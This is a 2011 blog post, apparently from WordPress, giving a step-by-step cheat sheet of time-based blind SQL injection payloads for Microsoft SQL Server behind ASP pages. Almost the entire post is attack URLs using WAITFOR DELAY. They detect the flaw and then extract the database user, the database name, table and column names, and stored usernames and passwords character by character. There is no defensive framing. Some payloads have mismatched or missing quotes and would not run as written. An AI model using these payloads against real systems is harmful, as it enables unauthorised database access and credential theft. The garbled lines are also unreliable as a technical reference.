Microsoft SQL Blind Exploit

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection

BLIND SQL INJECTION – DETECTION

Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY ’00:00:10‘– (+10 seconds)

String Injection:
http://[site]/page.asp?id=x’; WAITFOR DELAY ‘00:00:10‘– (+10 seconds) 

BLIND SQL INJECTION – EXTRACT DATABASE USER
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

D  – 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY ‘00:00:10‘– 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY ‘00:00:10‘– 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY ‘00:00:10‘– 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)Database User = DBO

 

BLIND SQL INJECTION – EXTRACT DATABASE NAME
 
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)Database Name = PRO-DB-1

 

BLIND SQL INJECTION – EXTRACT 1st  DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=’U’)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Table Name = USERS

 
BLIND SQL INJECTION – EXTRACT 2nd DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘)=6) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),1,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),2,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),3,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),4,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),5,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS),6,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Table Name = ORDERS

 
BLIND SQL INJECTION – EXTRACT 3rd DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘)=9) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),1,1)))=99) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),2,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),3,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),4,1)))=116) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),5,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),6,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),7,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),8,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS),9,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Table Name = CUSTOMERS

 
BLIND SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Column Name = USER

 
BLIND SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),1,1)))=112) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),2,1)))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>USER),3,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>’USER),4,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Column Name = PASS

 
BLIND SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>,PASS)=2) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>PASS),1,1)))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>PASS),2,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Column Name = ID

 
BLIND SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = ADMIN

 
BLIND SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = 123

 
BLIND SQL INJECTION – EXTRACT 3nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = 100

 
BLIND SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),2,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = JOE

 
BLIND SQL INJECTION – EXTRACT 1st FIELD OF 3nd ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),2,1)))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds) 
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),3,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = JIM
Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.